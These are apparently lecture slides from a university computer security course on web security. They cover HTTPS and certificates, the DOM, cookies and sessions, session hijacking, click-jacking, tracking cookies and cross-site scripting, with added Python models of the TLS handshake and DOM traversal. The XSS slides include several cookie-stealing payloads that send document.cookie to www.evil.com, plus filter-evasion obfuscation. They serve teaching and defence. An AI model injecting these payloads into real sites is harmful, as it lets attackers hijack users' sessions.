CSc 466/566 Computer Security
22 : Web Security
Version: 2014/12/02 15:30:17
Department of Computer Science, University of Arizona
Copyright © 2014 Christian Collberg
1/79
Outline

1. Introduction
2. HTTPS
3. Dynamic Content
   DOM Tree
   Sessions and Cookies
4. Attacks on Clients
   Session Hijacking
   Click-Jacking
   Privacy Attacks
   XSS
   CSRF
5. Attacks on Servers
   PHP
   File Inclusion
   SQL Injection Attacks
6. Summary

Introduction 2/79
Static Web Content

HTTP Request
```http
GET /index.html HTTP/1.1
Host: www.site.com
```

HTTP Response
```http
HTTP/1.1 200 OK
Server: Apache
Date: Mon, 16 Apr 2012 21:44:29 GMT
Expires: -1
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: ...
Content-Length: 314

<!doctype html><html><body>...</body></html>
```

Introduction 3/79
HTML

HTTP Request
```http
GET /index.html HTTP/1.1
Host: www.site.com
```

HTTP Response
```html
<b>bold text</b>
<ul>
<li>list item 1
<li>list item 2
</ul>
<a href="site.com/boat.jpg">Link!</a>
<script>document.location = ...
</script>
<img src="boat.jpg">
```

Introduction 4/79
Forms

www.site.com/register.php

```html
<HTML><TITLE>Registration</TITLE>
<BODY><FORM ACTION="register.php" METHOD="GET">
<INPUT TYPE="text" NAME="name">
<INPUT TYPE="text" NAME="email">
<INPUT TYPE="submit" VALUE="Submit">
</FORM></BODY></HTML>
```

HTTP Request
```
www.site.com/register.php?name="Alice"&email="alice@gmail.com"
```

Introduction 5/79
Confidentiality

HTTP requests and responses are delivered via TCP on port 80.
All traffic is in the clear!
This makes man-in-the-middle (MITM) attacks possible.

Introduction 6/79
HTTPS 7/79
HTTP over Secure Socket Layer (HTTPS)

1. Alice browses to https://chase.com
2. The browser sends chase.com a list of cryptographic ciphers/hash functions it supports.
3. The server selects the strongest ciphers/hash functions they both support.
4. chase.com tells the browser of its cryptographic choices.
5. chase.com sends the browser its certificate Cert_chase.com, containing its public key P_chase.com.
6. The browser verifies the authenticity of Cert_chase.com.
7. The browser generates a random number R.
8. The browser encrypts R with P_chase.com and sends it to chase.com.
9. Starting from R, the browser and chase.com generate a shared secret key K.
10. Subsequent messages M: send E_K(M), H(K||M).

HTTPS 8/79
HTTP over Secure Socket Layer (HTTPS)

[Figure: message sequence between Alice's browser, chase.com and the CA verisign.com; chase.com announces its choice ("Let's use AES, SHA-1!") and, once K is shared, each message travels as E_K(M), H(K||M).]

HTTPS 9/79
Digital Certificates

A Certificate Authority (CA) is a trusted third party (TTP) who issues a certificate stating that

The Bob who lives on Desolation Row and has phone number (555) 867-5309 and the email address [email protected] has the public key P_B. This certificate is valid until June 11, 2012.

The CA has to digitally sign (with their private key S_CA) this certificate so that we know that it's real.

HTTPS 10/79
Extended Validation Digital Certificates

Domain validation only SSL certificates: only minimal verification of the details in the certificate.
An Extended Validation Certificate can only be issued by a CA that passes an audit showing that it vets applications according to strict criteria.
Same structure as other X.509 public key certificates.
Not stronger encryption.

HTTPS 11/79
Extended Validation Digital Certificates...

In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV display in Internet Explorer 7. Their paper concluded that participants who received no training in browser security features did not notice the extended validation indicator and did not outperform the control group, whereas participants who were asked to read the Internet Explorer help file were more likely to classify both real and fake sites as legitimate.

Source: http://en.wikipedia.org/wiki/Extended_Validation_Certificate

HTTPS 12/79
Certificate Hierarchy

Certificates are signed by certificates higher in a certificate hierarchy.
The root certificate is self-signed.
Chain of Trust — similar to the Trusted Platform Module's trusted boot.

HTTPS 13/79
Checking the Validity of a Certificate

Is the certificate signed by a known trusted CA (pre-installed in the browser)?
Has the certificate expired?
Is the certificate revoked?
  1. Extract the revocation site URL from the certificate.
  2. Get the certificate revocation list.
  3. Is the list signed by the CA?
  4. Is this certificate's serial number on the list?

HTTPS 14/79
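The ten-step HTTPS handshake from the earlier slide and the certificate checks on this one, worked through in Python. This is an added example, not code from the lecture: textbook RSA on four-digit primes stands in for the real public-key cipher, a SHA-256 keystream plays E_K, and the tag is the slide's own H(K||M). The CA name verisign.com, the server chase.com, the cipher labels and their strength ranking, serial number 4242 and the June 11, 2012 expiry are all constructed for the scenario; the certificate and CRL encodings are a made-up stand-in for X.509.

```python
import hashlib
import secrets
from datetime import date, timedelta

# Toy RSA on four-digit primes so every number stays visible; real keys are 2048+ bits.
def rsa_key(p, q, e=17):
    n = p * q
    d = pow(e, -1, (p - 1) * (q - 1))
    return (n, e), (n, d)                         # (public key, private key)

def H(data):
    return hashlib.sha256(data).digest()

def sign(priv, data):
    n, d = priv
    return pow(int.from_bytes(H(data), "big") % n, d, n)

def verify(pub, data, sig):
    n, e = pub
    return pow(sig, e, n) == int.from_bytes(H(data), "big") % n

# A certificate is a dict; the CA signs a canonical encoding of every field
# except the signature itself (constructed format standing in for X.509).
def tbs(cert):
    return repr(sorted((k, str(v)) for k, v in cert.items() if k != "sig")).encode()

def issue_cert(ca_name, ca_priv, subject, subject_pub, serial, not_after):
    cert = {"subject": subject, "pub": subject_pub, "serial": serial,
            "issuer": ca_name, "not_after": not_after}
    cert["sig"] = sign(ca_priv, tbs(cert))
    return cert

def crl_bytes(serials):
    return repr(sorted(serials)).encode()

def check_cert(cert, trusted_cas, crl, today):
    """The checks from 'Checking the Validity of a Certificate', in slide order."""
    ca_pub = trusted_cas.get(cert["issuer"])
    if ca_pub is None:                                          # known, trusted CA?
        return "untrusted CA"
    if not verify(ca_pub, tbs(cert), cert["sig"]):              # really signed by it?
        return "bad signature"
    if today > cert["not_after"]:                               # expired?
        return "expired"
    if not verify(ca_pub, crl_bytes(crl["serials"]), crl["sig"]):   # CRL signed by the CA?
        return "CRL not signed by CA"
    if cert["serial"] in crl["serials"]:                        # serial on the list?
        return "revoked"
    return "ok"

# Toy symmetric layer: SHA-256 keystream XOR plays E_K, and the tag is the slide's H(K||M).
def encrypt(K, M):
    stream = b"".join(H(K + i.to_bytes(4, "big")) for i in range(len(M) // 32 + 1))
    return bytes(a ^ b for a, b in zip(M, stream))              # XOR is its own inverse

def tag(K, M):
    return H(K + M)    # as on the slide; HMAC is the hardened form of this idea

STRENGTH = {"RC4-SHA1": 1, "AES128-SHA1": 2, "AES256-SHA256": 3}   # constructed ranking

def handshake(client_ciphers, server_ciphers, cert, server_priv, trusted_cas, crl, today, M):
    """Steps 2-10 of the HTTPS slide; returns (status, M as the server decrypted it)."""
    common = set(client_ciphers) & set(server_ciphers)
    if not common:
        return "no common cipher", None
    chosen = max(common, key=STRENGTH.__getitem__)              # steps 2-4: strongest shared suite
    status = check_cert(cert, trusted_cas, crl, today)          # steps 5-6: certificate checks
    if status != "ok":
        return status, None
    n, e = cert["pub"]
    R = secrets.randbelow(n)                                    # step 7: browser picks random R
    R_enc = pow(R, e, n)                                        # step 8: encrypt R under P_chase.com
    R_srv = pow(R_enc, server_priv[1], server_priv[0])          # only the real server recovers R
    K_cli, K_srv = H(R.to_bytes(4, "big")), H(R_srv.to_bytes(4, "big"))   # step 9: K from R
    C, T = encrypt(K_cli, M), tag(K_cli, M)                     # step 10: E_K(M), H(K||M)
    M_srv = encrypt(K_srv, C)
    if tag(K_srv, M_srv) != T:
        return "tag mismatch", None
    return "ok:" + chosen, M_srv

def demo(days_late=0, revoked=False, trusted=True, tamper=False):
    """Constructed scenario: verisign.com certifies chase.com, valid until June 11, 2012."""
    ca_pub, ca_priv = rsa_key(1009, 1013)
    srv_pub, srv_priv = rsa_key(1019, 1031)
    cert = issue_cert("verisign.com", ca_priv, "chase.com", srv_pub, 4242, date(2012, 6, 11))
    if tamper:                                                  # an impostor swaps in its own key
        cert["pub"] = rsa_key(1033, 1039)[0]
    serials = [4242] if revoked else [7]
    crl = {"serials": serials, "sig": sign(ca_priv, crl_bytes(serials))}
    cas = {"verisign.com": ca_pub} if trusted else {}
    today = date(2012, 6, 1) + timedelta(days=days_late)
    return handshake(["RC4-SHA1", "AES256-SHA256"], ["AES128-SHA1", "AES256-SHA256"],
                     cert, srv_priv, cas, crl, today, b"GET /account HTTP/1.1")

if __name__ == "__main__":
    print(demo())
```

`demo()` runs the happy path; `demo(tamper=True)` shows why step 6 matters: an impostor that swaps its own public key into the certificate fails the CA signature check before the browser ever encrypts R, and `demo(revoked=True)` and `demo(days_late=40)` exercise the revocation and expiry checks. The H(K||M) tag is kept exactly as the slide writes it; in production the same intent is carried by HMAC, which closes the length-extension weakness of a bare hash over K||M.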
In-Class Exercise: Goodrich & Tamassia C-7.8

Suppose a web client and web server for a popular shopping web site have performed a key exchange so that they are now sharing a secret session key.
Describe a secure method for the web client to then navigate around various pages of the shopping site, optionally placing things into a shopping cart.
Your solution is allowed to use one-way hash functions and pseudo-random number generators, but it cannot use HTTPS, so it does not need to achieve confidentiality.
Your solution should be resistant to HTTP session hijacking even from someone who can sniff all the packets.

HTTPS 15/79
Dynamic Content 16/79
Dynamic Content

Plain HTML pages are static.
Dynamic content can change, even without reloading the page.
Client-side scripts are included in web pages to provide dynamic content.
Web pages are represented internally in the browser as DOM trees (Document Object Model).
Scripts can manipulate the DOM tree.
Most scripts are written in JavaScript.

Dynamic Content 17/79
DOM Tree Example

```html
<html><head>
<title>The document</title></head><body>
<div>Data</div><ul>
<li>Warning</li><li></li>
</ul><div>Top Secret!</div>
</body></html>
```

Source: http://javascript.info/tutorial/dom-nodes

Dynamic Content 18/79
DOM Tree Example...

HTML
  HEAD
    TITLE
      The document
  BODY
    DIV
      Data
    UL
      LI
        Warning
      LI
    DIV
      Top Secret!

Dynamic Content 19/79
JavaScript

JavaScript code can be included within HTML documents:

```html
<script type="text/javascript">
function hello() {
  alert("Hello world!");
}
</script>
```

JavaScript functions can be invoked as a result of clicks, etc.:

```html
<img src="..." onMouseOver="javascript:hello()">
```

Dynamic Content 20/79
DOM Tree Traversal

DOM tree node properties:

name                          description
firstChild, lastChild         start/end of this node's list of children
childNodes                    array of all this node's children
nextSibling, previousSibling  neighboring nodes with the same parent
parentNode                    the element that contains this node

Thus, you can traverse the DOM tree from within JavaScript:

```javascript
window.document.childNodes[0].childNodes[1].childNodes[4]
```

Dynamic Content 21/79
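A Python model of the DOM tree and of the node properties in the table above, serving both the "DOM Tree Example" slides and this traversal slide. It is an added example, not code from the lecture or from javascript.info: it parses the slide's document with the standard library's html.parser, renders the same indented tree as the "DOM Tree Example..." slide, and walks HTML -> BODY -> last DIV the way a script would. Whitespace-only text nodes are dropped so the output matches the slide's picture; a browser keeps them, which is why its childNodes indices differ.

```python
from html.parser import HTMLParser

class Node:
    """Minimal DOM node exposing the properties from the traversal table."""
    def __init__(self, nodeName, parentNode=None, text=None):
        self.nodeName, self.parentNode, self.text = nodeName, parentNode, text
        self.childNodes = []

    @property
    def firstChild(self):
        return self.childNodes[0] if self.childNodes else None

    @property
    def lastChild(self):
        return self.childNodes[-1] if self.childNodes else None

    def _sibling(self, offset):
        if self.parentNode is None:
            return None
        sibs = self.parentNode.childNodes
        i = sibs.index(self) + offset
        return sibs[i] if 0 <= i < len(sibs) else None

    @property
    def nextSibling(self):
        return self._sibling(1)

    @property
    def previousSibling(self):
        return self._sibling(-1)

VOID = {"img", "input", "br", "meta", "link", "hr"}   # elements that never have children

class DOMBuilder(HTMLParser):
    """Builds the tree while Python's HTMLParser tokenises the markup."""
    def __init__(self):
        super().__init__()
        self.document = Node("#document")
        self.cur = self.document                  # the element currently being filled

    def handle_starttag(self, tag, attrs):
        node = Node(tag.upper(), self.cur)
        node.attrs = dict(attrs)
        self.cur.childNodes.append(node)
        if tag not in VOID:
            self.cur = node

    def handle_endtag(self, tag):
        n = self.cur                              # close the nearest open element of this name
        while n is not self.document and n.nodeName != tag.upper():
            n = n.parentNode
        if n is not self.document:
            self.cur = n.parentNode

    def handle_data(self, data):
        if data.strip():                          # skip whitespace-only text, as the slide does
            self.cur.childNodes.append(Node("#text", self.cur, data.strip()))

def parse(html):
    builder = DOMBuilder()
    builder.feed(html)
    builder.close()
    return builder.document

def render(node, depth=0):
    """Indented listing in the style of the 'DOM Tree Example...' slide."""
    lines = []
    for child in node.childNodes:
        label = child.text if child.nodeName == "#text" else child.nodeName
        lines.append("  " * depth + label)
        lines.extend(render(child, depth + 1))
    return lines

# The slide's document (from javascript.info), embedded here as the sample input.
SAMPLE = """<html><head>
<title>The document</title></head><body>
<div>Data</div><ul>
<li>Warning</li><li></li>
</ul><div>Top Secret!</div>
</body></html>"""

def secret_text(html=SAMPLE):
    """Walk #document -> HTML -> BODY -> last DIV -> its text node, as a script could."""
    document = parse(html)
    body = document.childNodes[0].childNodes[1]   # HTML is child 0, BODY is HTML's child 1
    return body.lastChild.firstChild.text

if __name__ == "__main__":
    print("\n".join(render(parse(SAMPLE))))
```

The point for later slides is that any script running in the page reaches every node this way, including the "Top Secret!" DIV; the tree has no notion of which script is allowed to read which subtree.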
Sessions

HTTP is a state-less protocol:
  every request for a page is a new event to the server;
  the server keeps no information (automatically) between page loads.
A session is extra information stored about a visitor between interactions.
Three methods to keep track of sessions:
  1. Hidden form fields,
  2. Client-side cookies,
  3. Server-side session.
We must protect against session hijacking — an attacker getting hold of a user's session information and impersonating him to the server.

Dynamic Content 22/79
HTTP is Stateless

[Figure: Alice talks to www.site.com over several requests: "Hi, I'm Alice!" / "Hi, Alice!" / "Hi, it's Alice again!" / "Who are you?". Caption "Store state here, or here, or here!" points at hidden form fields, client-side cookies and server-side sessions.]

Dynamic Content 23/79
Sessions Using Hidden Form Fields

Any information that needs to survive between interactions is stored in the browser in hidden fields in the HTML.
The information is sent back to the server in POST or GET requests.

```html
<HTML><BODY><FORM ACTION="http://www.victoriassecret.com/buy.jsp" METHOD="get">
<INPUT TYPE="hidden" NAME="name" VALUE="Alice">
<INPUT TYPE="hidden" NAME="height" VALUE="170cm">
<INPUT TYPE="hidden" NAME="weight" VALUE="53kg">
<INPUT TYPE="submit">
</FORM></BODY></HTML>
```

HTTP is sent in cleartext — susceptible to MITM attack.

Dynamic Content 24/79
Sessions Using Hidden Form Fields...

[Figure: the hidden fields leave the browser in the query string name=Alice&height=170cm&weight=53kg, and Eve, sniffing the cleartext HTTP request, reads them.]

```html
<INPUT TYPE="hidden" NAME="name" VALUE="Alice">
<INPUT TYPE="hidden" NAME="height" VALUE="170cm">
<INPUT TYPE="hidden" NAME="weight" VALUE="53kg">
```

Use HTTPS instead.

Dynamic Content 25/79
Sessions Using Cookies

A cookie is a piece of data sent to the client by the web server.
The cookie is stored on the client.
When the user returns to the site, the cookie is sent to the web server.

cookie
```
"name"="Alice"
"height"="170cm"
"weight"="53kg"
expire=10 Dec, 2012
domain=.victoriassecret.com
path: /
send for: any type
```

Dynamic Content 26/79
Sessions Using Cookies

Let's assume Alice is browsing to http://www.victoriassecret.com.
She fills out a form with her personal data:

```html
<HTML><BODY><FORM ACTION="http://www.victoriassecret.com/buy.jsp" METHOD="get">
<INPUT TYPE="input" NAME="name" VALUE="Alice">
<INPUT TYPE="input" NAME="height" VALUE="170cm">
<INPUT TYPE="input" NAME="weight" VALUE="53kg">
<INPUT TYPE="submit">
</FORM></BODY></HTML>
```

Dynamic Content 27/79
[Figure: the browser submits the fields <INPUT TYPE="input" NAME="name" VALUE="Alice">, <INPUT TYPE="input" NAME="height" VALUE="170cm">, <INPUT TYPE="input" NAME="weight" VALUE="53kg"> to www.victoriassecret.com; the server answers with the cookie below, which the browser stores and sends back on each later visit to the site.]

cookie
```
"name"="Alice"
"height"="170cm"
"weight"="53kg"
expire=10 Dec, 2012
domain=.victoriassecret.com
path: /
send for: any type
```
Sessions Using Cookies — Cookie Properties
Expiration date: if none is specified, the cookie is a session cookie and is deleted when the user exits the browser.
Domain name — the site for which this cookie is valid:
  Only hosts within a domain can set a cookie for that domain.
  A host can set a cookie for a parent domain (shop.victoriassecret.com can set a cookie for .victoriassecret.com). Browsers following RFC 6265 allow any parent domain that is not a public suffix, not just one level up.
  A cookie set for a domain is sent to every host in that domain, so all its subdomains can read it.
  A host cannot set cookies for the TLDs (or for other public suffixes such as co.uk).
Dynamic Content 29/79
Cookie Domains
Cookie Transport
Cookies, by default, are sent over plain HTTP as well as over HTTPS.
MITM attacks: anyone on the path can read the cookie, and replay it!
Countermeasures:
1 Set the secure flag: the cookie is then only sent over HTTPS.
2 Encrypt the cookie value.
3 Obfuscate the cookie name.
Note that 2 and 3 only hide what the cookie contains; an eavesdropper can still replay the cookie exactly as captured. Only the secure flag keeps it off the wire in the clear.
Dynamic Content 31/79
Server-Side Sessions
User information is kept in a database on the server.
A session ID ( session token ) identifies the user’s session.
GET/POST variables or cookies are used to store the token on the client.
When the user browses to a page, the token is sent to the server, and the user's data is looked up from the database.
✞ ☎
<HTML><BODY><FORM ACTION="http://www.victoriassecret.com/buy.jsp"
METHOD="get">
<INPUT TYPE="hidden" NAME="sessionID" VALUE="0x324A...">
</FORM></BODY></HTML>
✝ ✆
Dynamic Content 32/79
Server-Side Sessions

sessionID   data
0x878...    name="Alice",height="170cm",..
0x9A5...    name="Bob",height="180cm",...

Alice's browser sends sessionID=0x878... with each request, and the server looks up her row.
The session ID should be hard to guess.
Dynamic Content 33/79
Outline
1 Introduction
2 HTTPS
3 Dynamic Content
  DOM Tree
  Sessions and Cookies
4 Attacks on Clients
  Session Hijacking
  Click-Jacking
  Privacy Attacks
  XSS
  CSRF
5 Attacks on Servers
  PHP
  File Inclusion
  SQL Injection Attacks
6 Summary
Attacks on Clients 34/79
Session Hijacking
TCP session hijacking can be used to take over an HTTP session.
The attacker also needs to impersonate the application's session mechanism (cookies, POST/GET variables, session ID).
Packet sniffers can be used to discover session IDs/cookies that are sent in the clear.
Replay attacks: an attacker uses an old (previously valid) token to attempt an HTTP session hijacking attack.
Attacks on Clients 35/79
Session Hijacking

sessionID   data
0x878...    name="Alice", height="170cm"
0x9A5...    name="Bob", height="180cm"

Alice -> server: sessionID=0x878...
Eve   -> server: sessionID=0x878...   (the token she sniffed from Alice)
The server cannot tell the two requests apart: whoever presents the token is Alice.
Attacks on Clients 36/79
Session Hijacking — Countermeasures
1 Client-side session tokens need to be encrypted (and integrity-protected with a MAC, so the client cannot tamper with the data they carry).
2 Server-side session IDs need to be random: generated by a cryptographically secure random number generator and long enough that guessing is infeasible.
3 To protect against replay attacks:
  1 add random numbers to client-side/server-side tokens,
  2 change session tokens frequently (and always after login).
Attacks on Clients 37/79
Click-Jacking
Clicking on a link takes you to the wrong site:
✞ ☎
<a onMouseUp=window.open("http://www.evil.com")
   href="http://www.trusted.com">Trust Me!</a>
✝ ✆
The status bar shows the href (www.trusted.com), but the onMouseUp handler fires on the click and opens www.evil.com.
Today "click-jacking" usually refers to UI redressing: a transparent iframe of a trusted site is laid over a decoy page so that the user's click lands on a hidden button. Sites defend against that with the X-Frame-Options header (or the CSP frame-ancestors directive).
Click-fraud: increasing the click-throughs to increase advertising revenue.
Attacks on Clients 38/79
Click-Jacking (figure)
Hovering over "Trust Me!" shows www.trusted.com (the href) in the status bar; on mouse-up the handler window.open("http://www.evil.com") runs, so the user ends up on www.evil.com.
Attacks on Clients 39/79
Privacy Attacks — Third-party cookies
1 You browse to http://www.example1.com:
✞ ☎
<HTML><BODY><img src="http://ads.evil.com">
</BODY></HTML>
✝ ✆
2 ads.evil.com sets a third-party cookie on your machine!
3 You browse to http://www.example2.com:
✞ ☎
<HTML><BODY><img src="http://ads.evil.com">
</BODY></HTML>
✝ ✆
4 ads.evil.com sets a third-party cookie on your machine!
5 Every request to ads.evil.com, including those image loads, carries its cookie (and the Referer of the embedding page), so ads.evil.com can link your visits to example1.com and example2.com to one identifier: it has your browsing history, even though it can never read example1.com's or example2.com's own cookies.
Attacks on Clients 40/79
Privacy Attacks — Third-party cookies (figure)
The browser visits www.example1.com, whose page is <HTML><BODY> <img src="http://ads.evil.com"></BODY></HTML>; the image request goes to ads.evil.com, which stores a cookie (site=example1.com) in the browser's cookie jar. Visiting www.example2.com, with the same embedded image, adds site=example2.com. The tracker's cookies now record the sites visited: browsing history!!!
Attacks on Clients 41/79
Cross-Site Scripting (XSS)
Idea:
1 attacker injects code C into a web site,
2 C makes its way into generated web page P,
3 a user is served the page P,
4 the injected code C is executed in the user's browser, with the origin (and cookies) of the web site.
Why does this work? The web programmer forgets to check (sanitize) input values, and to encode them when they are written into the page!
Attacks on Clients 42/79
Cross-Site Scripting (XSS) (figure)
The attacker submits <script>...</script> through an <INPUT TYPE="text" ...> form on www.site.com; the site stores it unchecked in its Database and later serves it, still as <script>...</script>, inside pages generated for other users, whose browsers run it. Sanitize input!
Attacks on Clients 43/79
Cross-Site Scripting. . .
Bob's server sends Alice this form:
✞ ☎
<HTML><TITLE>Sign My Guestbook!</TITLE>
<BODY><FORM ACTION="sign.php" METHOD="POST">
<INPUT TYPE="text" NAME="name">
<INPUT TYPE="text" NAME="message" size="40">
<INPUT TYPE="submit" VALUE="Submit">
</FORM></BODY></HTML>
✝ ✆
Attacks on Clients 44/79
Cross-Site Scripting. . .
Alice adds the text "I loved your new site!", and returns it to Bob's site.
In return, Bob sends her a new page:
✞ ☎
<HTML><TITLE>Sign My Guestbook!</TITLE>
<BODY>Thanks everybody for your input!<br>
Eve: I sat behind you in 7th grade! Call me!<br>
Joe: Yo, frat-bro, let's grab some brewskies!<br>
Alice: I loved your new site!<br>
</BODY></HTML>
✝ ✆
Attacks on Clients 45/79
Cross-Site Scripting. . .
What if Eve had instead added the text
✞ ☎
<script>alert("Alice sucks!");</script>
✝ ✆
as her comment?
Then Alice would be executing this page:
✞ ☎
<HTML><TITLE>Sign My Guestbook!</TITLE>
<BODY>Thanks everybody for your input!<br>
Eve: <script>alert("Alice sucks!");</script><br>
Joe: Yo, frat-bro, let's grab some brewskies!<br>
Alice: I loved your new site!
</BODY></HTML>
✝ ✆
Attacks on Clients 46/79
Cross-Site Scripting. . .
Obviously, Eve could insert more harmful code:
✞ ☎
<script>document.location=
  "http://www.evil.com/steal.php?cookie="+document.cookie;
</script>
✝ ✆
This redirects the browser to the evil site, and passes along Alice's cookies for Bob's site in the query string.
Alice would notice that she’s being redirected to a weird site!
Attacks on Clients 47/79
Cross-Site Scripting. . .
Eve could be more cunning:
✞ ☎
<script>img = new Image();
img.src="http://www.evil.com/steal.php?cookie="+
  document.cookie;</script>
✝ ✆
The browser tries to load an image from the evil site, passingalong the cookie.
No image is displayed — Alice doesn’t get suspicious!
Attacks on Clients 48/79
Cross-Site Scripting. . .
An iframe is used to create a web page within a web page:
✞ ☎
<iframe frameborder=0 src="" height=0 width=0 id="XSS" name="XSS">
</iframe><script>
frames["XSS"].location.href=
  "http://www.evil.com/steal.php?cookie="+document.cookie;
</script>
✝ ✆
This creates an invisible iframe, adding it to the DOM.
The script then points the iframe at the evil site, which receives the cookie while the visible page stays unchanged.
Attacks on Clients 49/79
Cross-Site Scripting — Nonpersistent
So far, we've seen persistent (stored) XSS attacks:
the code Eve injects gets added to the server's database; the code is displayed on the web page to every later visitor.
Non-persistent (reflected) XSS attack: the injected code is never stored; the server echoes it straight back in the response to the request that carried it, so the attacker has to get the victim to send that request (e.g., by clicking a crafted link).
Example:
1 attacker searches for "sneezing panda",
2 web site responds with
"search results for 'sneezing panda'=..."
Attacks on Clients 50/79
Cross-Site Scripting — Nonpersistent. . .
Assume a search page where the query is passed as a GET parameter:
✞ ☎
http://victim.com/search.php?query=searchstring
✝ ✆
The attacker constructs this URL:
✞ ☎
http://victim.com/search.php?query=<script>
document.location="http://evil.com/steal.php?cookie="+document.cookie
</script>
✝ ✆
When the victim navigates to the URL, the payload will beexecuted in their browser.
Attacks on Clients 51/79
![Page 119: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/119.jpg)
Cross-Site Scripting (XSS) — Nonpersistent
www.site.comhttp://site.com/search.php?query=panda
Attacks on Clients 52/79
![Page 120: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/120.jpg)
Cross-Site Scripting (XSS) — Nonpersistent
http://site.com/search.php?query=pandawww.site.com
Attacks on Clients 52/79
![Page 121: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/121.jpg)
Cross-Site Scripting (XSS) — Nonpersistent
Click!
www.site.com
<a href="http://site.com/search.php?query=panda">See cute pandas here!!!
</a>
www.pandas.com
Attacks on Clients 52/79
![Page 122: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/122.jpg)
Cross-Site Scripting (XSS) — Nonpersistent
Click!
www.site.com
<a href="http://site.com/search.php?query=panda">See cute pandas here!!!
</a>
www.pandas.com
Attacks on Clients 52/79
![Page 123: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/123.jpg)
Cross-Site Scripting (XSS) — Nonpersistent
Search results for "panda" is ...
www.site.com
<a href="http://site.com/search.php?query=panda">See cute pandas here!!!
</a>
www.pandas.com
Click!
Attacks on Clients 52/79
![Page 124: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/124.jpg)
Cross-Site Scripting (XSS) — Nonpersistent
Search results for "panda" is ...
www.site.com
<a href="http://site.com/search.php?query=panda">See cute pandas here!!!
</a>
www.pandas.com
Click!
Attacks on Clients 52/79
![Page 125: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/125.jpg)
Cross-Site Scripting (XSS) — Nonpersistent
<a href=http://site.com/search.php?query=
www.site.com
Click!
www.pandas.com
<script> document.location= "http://evil.com/steal.php?cookie="+ document.cookie </script>>
</a>See cute pandas here!
Attacks on Clients 52/79
![Page 126: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/126.jpg)
Cross-Site Scripting (XSS) — Nonpersistent
<a href=http://site.com/search.php?query=
www.site.com
Click!
www.pandas.com
<script> document.location= "http://evil.com/steal.php?cookie="+ document.cookie </script>>
</a>See cute pandas here!
Attacks on Clients 52/79
![Page 127: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/127.jpg)
Cross-Site Scripting (XSS) — Nonpersistent
<a href=http://site.com/search.php?query=
www.site.com
Click!
Search results for is ...
www.pandas.com
<script> document.location= "http://evil.com/steal.php?cookie="+ document.cookie </script>>
</a>See cute pandas here!
Attacks on Clients 52/79
![Page 128: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/128.jpg)
Cross-Site Scripting (XSS) — Nonpersistent
(Figure: Alice, www.site.com and www.pandas.com. Alice clicks the link on www.pandas.com ("Click!"), and www.site.com reflects the query back in a page reading "Search results for ... is ...".)
The link on www.pandas.com:
```html
<a href=http://site.com/search.php?query=<script> document.location="http://evil.com/steal.php?cookie="+document.cookie </script>>See cute pandas here!</a>
```
Attacks on Clients 52/79
Cross-Site Scripting — Countermeasures
Programmers must sanitize all inputs:
Strip out all <script> tags!
Users can disable client-side scripts.
Firefox NoScript XSS detection sanitizes GET/POST variables:
remove quotes, double quotes, brackets.
Attacks on Clients 53/79
Cross-Site Scripting — Counter-Countermeasures
Evade filtering by obfuscating GET requests using URL encoding.
This request
```html
<script>alert('hello');</script>
```
turns into
```
%3Cscript%3Ealert%28%27hello%27%29%3B%3C%2Fscript%3E
```
Attacks on Clients 54/79
Cross-Site Scripting — Counter-Countermeasures. . .
Obfuscate the script to avoid detection:
```html
<script>
a = document.cookie;
b = "ht";
c = "tp";
d = "://";
e = "ww";
f = "w.";
g = "vic";
h = "tim";
i = ".c";
j = "om/search.p";
k = "hp?q=";
// b..k concatenate to http://www.victim.com/search.php?q= , a appends the cookie
document.location = b+c+d+e+f+g+h+i+j+k+a;
</script>
```
Attacks on Clients 55/79
